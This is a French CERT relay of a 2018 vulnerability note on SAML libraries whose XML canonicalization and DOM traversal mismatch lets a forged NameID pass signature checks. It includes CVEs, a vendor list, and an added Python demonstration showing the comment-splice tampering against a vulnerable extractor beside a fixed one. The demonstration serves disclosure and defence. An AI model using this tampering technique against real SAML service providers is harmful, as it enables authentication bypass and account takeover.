
====================================================================

                             CERT-Renater

                 Note d'Information No. 2018/VULN083
_____________________________________________________________________

DATE                : 28/02/2018

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running SAML libraries.

=====================================================================
https://www.kb.cert.org/vuls/id/475445
_____________________________________________________________________


Vulnerability Note VU#475445

Multiple SAML libraries may allow authentication bypass via incorrect
XML canonicalization and DOM traversal

Original Release date: 27 Feb 2018 | Last revised: 27 Feb 2018


Overview

Multiple SAML libraries may incorrectly utilize the results of XML DOM
traversal and canonicalization APIs in such a way that an attacker may
be able to manipulate the SAML data without invalidating the
cryptographic signature, allowing the attacker to potentially bypass
authentication to SAML service providers.


Description

CWE-287: Improper Authentication

Security Assertion Markup Language (SAML) is an XML-based markup
language for security assertions regarding authentication and
permissions, most commonly used for single sign-on (SSO) services.

Some XML DOM traversal and canonicalization APIs are inconsistent in
their handling of comments inside XML elements. Canonicalization, as
used when computing and verifying the XML signature, strips comments,
so a comment inserted into an element's text does not change the
signature. Some DOM traversal APIs, however, split the element's text
at the comment and return only the text node before it. A SAML library
that reads, for example, the NameID with such an API therefore acts on
a truncated value, while the signature covers the full text with the
comment removed.

A remote attacker can modify SAML content sent to a SAML service
provider without invalidating the cryptographic signature, which may
allow the attacker to bypass primary authentication for the affected
SAML service provider.
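The mismatch described above, reproduced as an added Python example that is
not part of this advisory or of any of the listed libraries. It assumes a
constructed assertion, the standard library's C14N 2.0 implementation
(ET.canonicalize) as a stand-in for the exclusive C14N used by XML-DSig,
and an HMAC over the canonical bytes as a stand-in for the IdP's RSA
signature; the comment-stripping behaviour is the same, which is all that
matters here. The attacker's real account is "user@example.com.evil.test";
splicing an empty comment into the NameID leaves the signature valid while
a first-text-node DOM read yields "user@example.com".

```python
"""Constructed reproduction of the comment-handling mismatch behind VU#475445."""
import hashlib
import hmac
import xml.etree.ElementTree as ET
from xml.dom import minidom

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"
IDP_KEY = b"idp-signing-key-for-demo-only"  # assumption: stands in for the IdP's private key

# Constructed assertion as the IdP issued it for the attacker's legitimate
# account at a domain the attacker controls.
ISSUED = """<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="_demo">
  <saml:Subject>
    <saml:NameID>user@example.com.evil.test</saml:NameID>
  </saml:Subject>
</saml:Assertion>"""

# What the attacker forwards to the service provider: the same assertion
# with an empty XML comment spliced into the NameID text.
TAMPERED = ISSUED.replace("user@example.com.evil.test",
                          "user@example.com<!---->.evil.test")


def canonicalize(xml_text: str) -> str:
    """Canonical form with comments dropped (C14N 2.0 here; exclusive C14N
    as used by XML-DSig strips comments the same way)."""
    return ET.canonicalize(xml_text, with_comments=False)


def idp_sign(xml_text: str) -> str:
    """Stand-in for the IdP's XML signature: HMAC over the canonical bytes."""
    return hmac.new(IDP_KEY, canonicalize(xml_text).encode(),
                    hashlib.sha256).hexdigest()


def sp_verify(xml_text: str, signature: str) -> bool:
    """Stand-in for signature verification: recompute over the canonical bytes."""
    return hmac.compare_digest(idp_sign(xml_text), signature)


def extract_nameid_vulnerable(xml_text: str) -> str:
    """The buggy pattern: walk the raw DOM and read only the first text node.
    A comment splits the text into two nodes and the second one is dropped."""
    doc = minidom.parseString(xml_text)
    node = doc.getElementsByTagNameNS(SAML_NS, "NameID")[0]
    return node.firstChild.data


def extract_nameid_fixed(xml_text: str) -> str:
    """Hardened pattern: read the NameID from the canonical bytes the
    signature actually covered, and refuse anything but one text child."""
    doc = minidom.parseString(canonicalize(xml_text))
    node = doc.getElementsByTagNameNS(SAML_NS, "NameID")[0]
    children = node.childNodes
    if len(children) != 1 or children[0].nodeType != node.TEXT_NODE:
        raise ValueError("NameID must contain exactly one text node")
    return children[0].data


def sp_login(xml_text: str, signature: str, extractor) -> str:
    """Return the identity the SP would log in, or raise if the signature fails."""
    if not sp_verify(xml_text, signature):
        raise PermissionError("signature does not verify")
    return extractor(xml_text)


if __name__ == "__main__":
    sig = idp_sign(ISSUED)
    # Tampering leaves the canonical bytes unchanged, so the signature survives.
    assert canonicalize(ISSUED) == canonicalize(TAMPERED)
    print("vulnerable SP logs in:", sp_login(TAMPERED, sig, extract_nameid_vulnerable))
    print("fixed SP logs in:     ", sp_login(TAMPERED, sig, extract_nameid_fixed))
```

The fix that the affected libraries shipped amounts to the second extractor:
take the value from the form that was verified, not from a separate walk of
the raw input, and treat any non-text node inside an identity-bearing element
as a reason to reject the assertion.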

The following CVEs are assigned:

CVE-2017-11427 - OneLogin's "python-saml"
CVE-2017-11428 - OneLogin's "ruby-saml"
CVE-2017-11429 - Clever's "saml2-js"
CVE-2017-11430 - "OmniAuth-SAML"
CVE-2018-0489 - Shibboleth openSAML C++

More information is available in the researcher's blog post.


Impact

By modifying SAML content without invalidating the cryptographic
signature, a remote, unauthenticated attacker may be able to bypass
primary authentication for an affected SAML service provider.


Solution

Apply updates

Affected SAML service providers should update software to utilize the
latest releases of affected SAML libraries. Please see the vendor list
below for more information.


Vendor Information

Vendor                         Status       Date         Date
                                            Notified     Updated
Clever, Inc.                   Affected     24 Jan 2018  26 Feb 2018
Duo Security                   Affected     -            22 Feb 2018
OmniAuth                       Affected     24 Jan 2018  06 Feb 2018
OneLogin Inc                   Affected     24 Jan 2018  27 Feb 2018
Shibboleth Consortium          Affected     24 Jan 2018  06 Feb 2018
AssureBridge                   Not Affected -            27 Feb 2018
Okta Inc.                      Not Affected 29 Jan 2018  27 Feb 2018
Box                            Unknown      23 Feb 2018  23 Feb 2018
Cisco                          Unknown      23 Feb 2018  23 Feb 2018
Danish e-Infrastructure
Cooperation                    Unknown      24 Jan 2018  24 Jan 2018
(WAYF)
Entr'ouvert                    Unknown      24 Jan 2018  24 Jan 2018
GitHub                         Unknown      24 Jan 2018  24 Jan 2018
Google                         Unknown      23 Feb 2018  23 Feb 2018
Microsoft                      Unknown      23 Feb 2018  23 Feb 2018
Pivotal Software, Inc.         Unknown      24 Jan 2018  24 Jan 2018

If you are a vendor and your product is affected, let us know.

CVSS Metrics (CVSS v2)

    Group     Score             Vector
Base          6.3   AV:N/AC:M/Au:S/C:C/I:N/A:N
Temporal      4.9   E:POC/RL:OF/RC:C
Environmental 4.9   CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND

References

  * https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
  * https://duo.com/labs/psa/duo-psa-2017-003
  * https://shibboleth.net/community/advisories/secadv_20180112.txt
  * https://cwe.mitre.org/data/definitions/287.html

Credit

Thanks to Kelby Ludwig of Duo Security for reporting this vulnerability.

This document was written by Garret Wassermann.

Other Information

  * CVE IDs: CVE-2017-11427 CVE-2017-11428 CVE-2017-11429 CVE-2017-11430
    CVE-2018-0489
  * Date Public: 27 Feb 2018
  * Date First Published: 27 Feb 2018
  * Date Last Updated: 27 Feb 2018
  * Document Revision: 67


==========================================================
+ CERT-RENATER          | tel : 01-53-94-20-44           +
+ 23 - 25 Rue Daviel    | fax : 01-53-94-20-41           +
+ 75013 Paris           | email: cert@support.renater.fr +
==========================================================



